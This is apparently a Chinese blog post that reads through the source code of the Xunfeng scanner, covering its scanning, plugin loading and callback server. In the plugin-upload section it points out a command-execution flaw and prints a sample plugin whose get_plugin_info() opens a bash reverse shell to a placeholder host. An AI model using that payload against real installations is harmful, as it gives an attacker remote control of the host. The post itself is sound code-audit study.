github地址:https://github.com/ysrc/xunfeng 根據官網給出的安裝方法安裝,而後啓動run.shpython
#!/bin/bash sudo mongod --port 65521 --dbpath /opt/xunfeng/db/ & CURRENT_PATH=`dirname $0` cd $CURRENT_PATH XUNFENG_LOG=/var/log/xunfeng XUNFENG_DB=/var/lib/mongodb [ ! -d $XUNFENG_LOG ] && mkdir -p ${XUNFENG_LOG} [ ! -d $XUNFENG_DB ] && mkdir -p ${XUNFENG_DB} nohup mongod --port 65521 --dbpath=${XUNFENG_DB} --auth > ${XUNFENG_LOG}/db.log & nohup /usr/local/bin/python2.7.11 ./Run.py > ${XUNFENG_LOG}/web.log & nohup /usr/local/bin/python2.7.11 ./aider/Aider.py > ${XUNFENG_LOG}/aider.log & nohup /usr/local/bin/python2.7.11 ./nascan/NAScan.py > ${XUNFENG_LOG}/scan.log & nohup /usr/local/bin/python2.7.11 ./vulscan/VulScan.py > ${XUNFENG_LOG}/vul.log &
from views.View import app if __name__ == '__main__': #app.debug = True app.run(threaded=True, port=80,host='')
去./views/view.py 查看代碼。flask
from flask import request, render_template, redirect, url_for, session, make_response
# 刪除全部
@app.route('/deleteall', methods=['post'])
def Deleteall():
return 'success'
看到@logincheck裝飾器函數。位於 ./views/lib/Login.py
def logincheck(f): @wraps(f) def wrapper(*args, **kwargs): try: if session.has_key('login'): if session['login'] == 'loginsuccess': return f(*args, **kwargs) else: return redirect(url_for('Login')) else: return redirect(url_for('Login')) except Exception, e: print e return redirect(url_for('Error')) return wrapper
#./views/lib/AntiCSRF.py # 檢查referer def anticsrf(f): @wraps(f) def wrapper(*args, **kwargs): try: if request.referrer and request.referrer.replace('http://', '').split('/')[0] == request.host: return f(*args, **kwargs) else: return redirect(url_for('NotFound')) except Exception, e: print e return redirect(url_for('Error')) return wrapper
#/views/view.py # 刪除全部 @app.route('/deleteall', methods=['post']) @logincheck @anticsrf def Deleteall(): Mongo.coll['Task'].remove({}) return 'success'
from . import app, Mongo, page_size, file_path
@app.route('/updateconfig', methods=['get', 'post']) @logincheck @anticsrf def UpdateConfig(): rsp = 'fail' name = request.form.get('name', 'default') value = request.form.get('value', '') conftype = request.form.get('conftype', '') if name and value and conftype: if name == 'Masscan' or name == 'Port_list': origin_value = Mongo.coll['Config'].find_one({'type': 'nascan'})["config"][name]["value"] value = origin_value.split('|')[0] + '|' + value elif name == 'Port_list_Flag': name = 'Port_list' origin_value = Mongo.coll['Config'].find_one({'type': 'nascan'})["config"]['Port_list']["value"] value = value + '|' + origin_value.split('|')[1] elif name == 'Masscan_Flag': name = 'Masscan' path = Mongo.coll['Config'].find_one({'type': 'nascan'})["config"]["Masscan"]["value"] if len(path.split('|')) == 3: path = path.split('|')[1] + "|" + path.split('|')[2] else: path = path.split('|')[1] if value == '1': value = '1|' + path else: value = '0|' + path result = Mongo.coll['Config'].update({"type": conftype}, {'$set': {'config.' + name + '.value': value}}) if result: rsp = 'success' return rsp
request.form.get('name', 'default') 從get中取name參數的值,默認是default。
if name == 'Masscan' or name == 'Port_list': origin_value = Mongo.coll['Config'].find_one({'type': 'nascan'})["config"][name]["value"] value = origin_value.split('|')[0] + '|' + value
result = Mongo.coll['Config'].update({"type": conftype}, {'$set': {'config.' + name + '.value': value}})
#/nascan/NAScan.py CONFIG_INI = get_config() # 讀取配置,讀取mongodb裏面的數據,位於Config表下的內容 log.write('info', None, 0, u'獲取配置成功') STATISTICS = get_statistics() # 讀取統計信息,返回一個日期 MASSCAN_AC = [0] NACHANGE = [0] thread.start_new_thread(monitor, (CONFIG_INI,STATISTICS,NACHANGE)) # 心跳線程 thread.start_new_thread(cruise, (STATISTICS,MASSCAN_AC)) # 失效ip:port記錄刪除線程 socket.setdefaulttimeout(int(CONFIG_INI['Timeout']) / 2) # 設置鏈接超時 ac_data = [] while True: now_time = time.localtime() now_hour = now_time.tm_hour now_day = now_time.tm_mday now_date = str(now_time.tm_year) + str(now_time.tm_mon) + str(now_day) cy_day, ac_hour = CONFIG_INI['Cycle'].split('|')#資產探測週期 log.write('info', None, 0, u'掃描規則: ' + str(CONFIG_INI['Cycle'])) if (now_hour == int(ac_hour) and now_day % int(cy_day) == 0 and now_date not in ac_data) or NACHANGE[0]: # 判斷是否進入掃描時段 ac_data.append(now_date) NACHANGE[0] = 0 log.write('info', None, 0, u'開始掃描') s = start(CONFIG_INI) s.masscan_ac = MASSCAN_AC s.statistics = STATISTICS s.run() time.sleep(60)
def get_config(): config = {} config_info = mongo.na_db.Config.find_one({"type": "nascan"}) for name in config_info['config']: if name in ['Discern_cms', 'Discern_con', 'Discern_lang', 'Discern_server']: config[name] = format_config(name, config_info['config'][name]['value'])#分割處理 else: config[name] = config_info['config'][name]['value']#直接添加 return config
MASSCAN_AC NACHANGE 這兩個變量MASSCAN_AC是系統是否支持masscan的掃描,NACHANGE是用來監控如今的掃描列表和開始的列表有沒有變化,若是有變化將NACHANGE[0]改爲NACHANGE[1]。接着
thread.start_new_thread(monitor, (CONFIG_INI,STATISTICS,NACHANGE)) # 心跳線程
thread.start_new_thread(cruise, (STATISTICS,MASSCAN_AC)) # 失效ip:port記錄刪除線程
socket.setdefaulttimeout(int(CONFIG_INI['Timeout']) / 2) # 設置鏈接超時
def monitor(CONFIG_INI, STATISTICS, NACHANGE): while True: try: time_ = datetime.datetime.now() date_ = time_.strftime('%Y-%m-%d') mongo.na_db.Heartbeat.update({"name": "heartbeat"}, {"$set": {"up_time": time_}}) if date_ not in STATISTICS: STATISTICS[date_] = {"add": 0, "update": 0, "delete": 0} mongo.na_db.Statistics.update({"date": date_}, {"$set": {"info": STATISTICS[date_]}}, upsert=True) new_config = get_config() #再次調用get_config, 好像能直接new_config=CONFIG_INI 不知道會不會有問題?應該不會,可是這個是用來監控先後的Scan_list的變化,因此不能改 if base64.b64encode(CONFIG_INI["Scan_list"]) != base64.b64encode(new_config["Scan_list"]):NACHANGE[0] = 1 # 判斷如今的掃描列表和開始的列表有沒有變化,若是有變化將NACHANGE[0]改爲NACHANGE[1] ! 若是要改爲python3,這裏須要改 CONFIG_INI.clear() CONFIG_INI.update(new_config)#更新成新的new_config,而後睡眠30秒 except Exception, e: print e time.sleep(30)
學習到了python if和for語句單行表達的風格:
for i in range(3): print("+1s"); print("+2s") if len("excited") > 0: print("big news!"); print("+1s")
def cruise(STATISTICS,MASSCAN_AC): while True: now_str = datetime.datetime.now() week = int(now_str.weekday()) hour = int(now_str.hour) if week >= 1 and week <= 5 and hour >= 9 and hour <= 18: # 非工做時間不刪除 try: data = mongo.NA_INFO.find().sort("time", 1) for history_info in data: while True: if MASSCAN_AC[0]: # 若是masscan正在掃描即不進行清理 time.sleep(10) else: break ip = history_info['ip'] port = history_info['port'] try: sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.connect((ip, int(port))) sock.close() except Exception as e: time_ = datetime.datetime.now() date_ = time_.strftime('%Y-%m-%d') #對ip:port 進行sock鏈接,若是鏈接不上就刪除INFO裏面ip和port mongo.NA_INFO.remove({"ip": ip, "port": port}) log.write('info', None, 0, '%s:%s delete' % (ip, port)) STATISTICS[date_]['delete'] += 1 del history_info["_id"] history_info['del_time'] = time_ history_info['type'] = 'delete' #而後把數據插入到HISTORY表中 mongo.NA_HISTORY.insert(history_info) except: pass time.sleep(3600)
#/nascan/NAScan.py s = start(CONFIG_INI) s.masscan_ac = MASSCAN_AC s.statistics = STATISTICS s.run()
#/nascan/lib/start.py def run(self): global AC_PORT_LIST all_ip_list = [] for ip in self.scan_list: if "/" in ip: ip = cidr.CIDR(ip) if not ip:continue ip_list = self.get_ip_list(ip) if self.mode == 1:#判斷maascan是否開啓 self.masscan_path = self.config_ini['Masscan'].split('|')[2] self.masscan_rate = self.config_ini['Masscan'].split('|')[1] ip_list = self.get_ac_ip(ip_list) self.masscan_ac[0] = 1 AC_PORT_LIST = self.masscan(ip_list) # 若是安裝了Masscan即便用Masscan進行全端口掃描 if not AC_PORT_LIST: continue self.masscan_ac[0] = 0 for ip_str in AC_PORT_LIST.keys(): self.queue.put(ip_str) # 將掃描到的ip加入隊列 self.scan_start() # 開始掃描 else: all_ip_list.extend(ip_list) if self.mode == 0: if self.icmp: all_ip_list = self.get_ac_ip(all_ip_list) for ip_str in all_ip_list: self.queue.put(ip_str) # 加入隊列 self.scan_start() # TCP探測模式開始掃描
其中if "/" in ip: ip = cidr.CIDR(ip) ,支持的格式是
接着 if self.mode == 1: #判斷maascan是否開啓,若是沒有開啓,將ip添加到all_ip_list這個列表中,若是開啓了,就調用masscan進行全端口掃描。
def masscan(self, ip): try: if len(ip) == 0: return #取目錄下的/plugin/masscan.py ,而後調用masscan進行掃描,再將結果返回 sys.path.append(sys.path[0] + "/plugin") m_scan = __import__("masscan") result = m_scan.run(ip, self.masscan_path, self.masscan_rate) return result except Exception, e: print e print 'No masscan plugin detected'
masscan -p1-65535 -iL target.log -oL tmp.log --randomize-hosts --rate=20000
用masscan掃描完保存成tmp.log 而後讀取完解析結果。
#/nascan/lib/scan.py class scan: def __init__(self, task_host, port_list): self.ip = task_host self.port_list = port_list self.config_ini = {} def run(self): self.timeout = int(self.config_ini['Timeout']) for _port in self.port_list: self.server = '' self.banner = '' self.port = int(_port) self.scan_port() # 端口掃描 if not self.banner:continue self.server_discern() # 服務識別 if self.server == '': web_info = self.try_web() # 嘗試web訪問 if web_info: log.write('web', self.ip, self.port, web_info) time_ = datetime.datetime.now() mongo.NA_INFO.update({'ip': self.ip, 'port': self.port}, {"$set": {'banner': self.banner, 'server': 'web', 'webinfo': web_info, 'time': time_}})
再回到View.py 這個文件下。
@app.route('/analysis') @logincheck def Analysis(): ... return render_template('analysis.html', ip=ip, record=record, task=task, vul=vul, plugin=plugin, vultype=vultype, trend=sorted(trend, key=lambda x: x['time']), taskpercent=taskpercent, taskalive=taskalive, scanalive=scanalive, server_type=server_type, web_type=web_type)
加載template:analysis.html ,利用raphael來建立svg矢量圖。raphael好像很好用,記錄一下。官網:http://dmitrybaranovskiy.github.io/raphael/
# 新增插件異步 @app.route('/addplugin', methods=['get', 'post']) @logincheck @anticsrf def AddPlugin(): result = 'fail' f = request.files['file'] isupload = request.form.get('isupload', 'false') file_name = '' if f: fname = secure_filename(f.filename)#處理文件名 if fname.split('.')[-1] == 'py': path = file_path + fname if os.path.exists(file_path + fname): fname = fname.split('.')[0] + '_' + str(datetime.now().second) + '.py' path = file_path + fname f.save(path) if os.path.exists(path): file_name = fname.split('.')[0] module = __import__(file_name) mark_json = module.get_plugin_info() mark_json['filename'] = file_name mark_json['add_time'] = datetime.now() mark_json['count'] = 0 if 'source' not in mark_json: mark_json['source'] = 0 insert_result = Mongo.coll['Plugin'].insert(mark_json) if insert_result: result = 'success' file_name = file_name +'.py'
file_name = fname.split('.')[0] module = __import__(file_name) mark_json = module.get_plugin_info()
上傳以後的文件名用.進行分割,而後import文件,而後直接執行get_plugin_info() 函數,若是插件是下面這樣的就造成了命令執行。
def get_plugin_info(): import os; os.system("bash -i >& /dev/tcp/ip/55444 0>&1");
init()#先判斷數據庫中的插件數量,若是小於1那就讀取vuldb下的文件,讀取他們的詳情get_plugin_info() PASSWORD_DIC, THREAD_COUNT, TIMEOUT, WHITE_LIST = get_config()#讀取mongodb數據庫Config表下type=vulscan的的各個值,有弱口令字典,超時時間,線程數,白名單ip thread.start_new_thread(monitor, ()) while True: task_id, task_plan, task_target, task_plugin = queue_get()#獲取task表的數據 if task_id == '': time.sleep(10) continue if PLUGIN_DB: del sys.modules[PLUGIN_DB.keys()[0]] # 清理插件緩存,Python中全部加載到內存的模塊都放在sys.modules PLUGIN_DB.clear() for task_netloc in task_target: while True: if int(thread._count()) < THREAD_COUNT: if task_netloc[0] in WHITE_LIST: break#若是task_netloc的ip在ip白名單裏 thread.start_new_thread(vulscan, (task_id, task_netloc, task_plugin)) break else: time.sleep(2) if task_plan == 0: na_task.update({"_id": task_id}, {"$set": {"status": 2}})
從這句開始講,thread.start_new_thread(vulscan, (task_id, task_netloc, task_plugin))
def start(self): self.get_plugin_info() if '.json' in self.plugin_info['filename']: # 標示符檢測模式,用json寫的exp try: self.load_json_plugin() # 讀取漏洞標示 self.set_request() # 標示符轉換爲請求 self.poc_check() # 檢測 except Exception, e: return else: # 腳本檢測模式 plugin_filename = self.plugin_info['filename'] self.log(str(self.task_netloc) + "call " + self.task_plugin) if task_plugin not in PLUGIN_DB: plugin_res = __import__(plugin_filename) setattr(plugin_res, "PASSWORD_DIC", PASSWORD_DIC) # 給插件聲明密碼字典 PLUGIN_DB[plugin_filename] = plugin_res try: self.result_info = PLUGIN_DB[plugin_filename].check(str(self.task_netloc[0]), int(self.task_netloc[1]), TIMEOUT) except: return self.save_request() # 保存結果
他檢測兩種模式,一種是.json寫的,經過self.plugin_info['filename'] 來判斷,在mongodb中是這樣的,
self.load_json_plugin() # 讀取漏洞標示 self.set_request() # 標示符轉換爲請求 self.poc_check() # 檢測
讀取/vulscan/vuldb/*.json 下的json文件內容,將plugin讀取出來。
def poc_check(self): ...... ...... an_type = self.plugin_info['plugin']['analyzing'] vul_tag = self.plugin_info['plugin']['tag'] analyzingdata = self.plugin_info['plugin']['analyzingdata'] if an_type == 'keyword':#關鍵字匹配 # print poc['analyzingdata'].encode("utf-8") if analyzingdata.encode("utf-8") in res_html: self.result_info = vul_tag#若是analyzingdata的數據在html中 elif an_type == 'regex':#正則匹配 if re.search(analyzingdata, res_html, re.I): self.result_info = vul_tag elif an_type == 'md5':#md5匹配 md5 = hashlib.md5() md5.update(res_html) if md5.hexdigest() == analyzingdata: self.result_info = vul_tag
plugin_filename = self.plugin_info['filename'] self.log(str(self.task_netloc) + "call " + self.task_plugin) if task_plugin not in PLUGIN_DB:#若是PLUGIN_DB裏沒有task_plugin plugin_res = __import__(plugin_filename)#導入plugin_filename的腳本,參考http://www.cnblogs.com/MaggieXiang/archive/2013/06/05/3118156.html setattr(plugin_res, "PASSWORD_DIC", PASSWORD_DIC) # 給插件聲明密碼字典 ,給對象的屬性賦值,若屬性不存在,先建立再賦值。 PLUGIN_DB[plugin_filename] = plugin_res try: self.result_info = PLUGIN_DB[plugin_filename].check(str(self.task_netloc[0]), int(self.task_netloc[1]), TIMEOUT)#調用腳本中的check(),傳進去的是host和port,超時時間 except: return
導入vuldb下的腳本,而後執行check()函數,傳入host port timeout。將結果保存到了self.result_info,而後調用self.save_request()函數整理最後的結果。
最後的一個腳本:Aider.py 他綁定了53和8088端口。
# coding:utf-8 import socket,thread,datetime,time dns = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) dns.bind(('', 53))while True: try: time.sleep(1) recv, addr = dns.recvfrom(1024)print datetime.datetime.now().strftime('%m-%d %H:%M:%S') + " " + str(addr[0]) + ' Dns Query: ' + recv except Exception, e: print e continue
if recv not in query_history:query_history.append(recv)
def web_server(): web = socket.socket(socket.AF_INET,socket.SOCK_STREAM) web.bind(('',8088)) web.listen(10) while True: try: conn,addr = web.accept() data = conn.recv(4096) req_line = data.split("\r\n")[0] path = req_line.split()[1] route_list = path.split('/') html = "NO" if len(route_list) == 3: if route_list[1] == 'add': if route_list[2] not in url_history: url_history.append(route_list[2]) elif route_list[1] == 'check': if route_list[2] in url_history: url_history.remove(route_list[2]) html = 'YES' else: query_str = route_list[1] for query_raw in query_history: if query_str in query_raw: query_history.remove(query_raw) html = "YES" print datetime.datetime.now().strftime('%m-%d %H:%M:%S') + " " + str(addr[0]) +' web query: ' + path raw = "HTTP/1.0 200 OK\r\nContent-Type: application/json; charset=utf-8\r\nContent-Length: %d\r\nConnection: close\r\n\r\n%s" %(len(html),html) conn.send(raw) conn.close() except: pass
若是分割後的數組不爲3,去取第二個數組的值,若是第二個數組的值在 query_history數組中,那麼就先刪除query_history數組中的這個字符串,而後設置返回頁面爲YES.